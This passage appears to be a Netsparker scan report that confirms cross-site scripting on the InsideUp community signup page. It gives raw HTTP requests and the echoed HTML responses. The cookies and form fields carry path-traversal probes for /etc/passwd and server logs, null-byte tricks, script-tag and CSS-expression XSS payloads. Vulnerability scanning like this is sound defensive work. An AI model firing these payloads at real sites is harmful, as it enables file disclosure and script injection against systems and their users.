OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 256
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001336)%3c%2fscript%3e&lastName=Smith&companyName=Smith&password1=3&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:50 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=8DAFA76EF032331FD1EAE906BCD17BCD; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST '"--></style></script><script>alert(0x00133F)</script>
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3
termsOfService POST 1
receiveSpecialOfferEmail POST 1
x POST 0
y POST 0

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 312
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00133F)%3c%2fscript%3e&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3&termsOfService=1&receiveSpecialOfferEmail=1&x=0&y=0

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:55 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=4A9EC1AAB2D01C6725CC72E1835E93A4; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 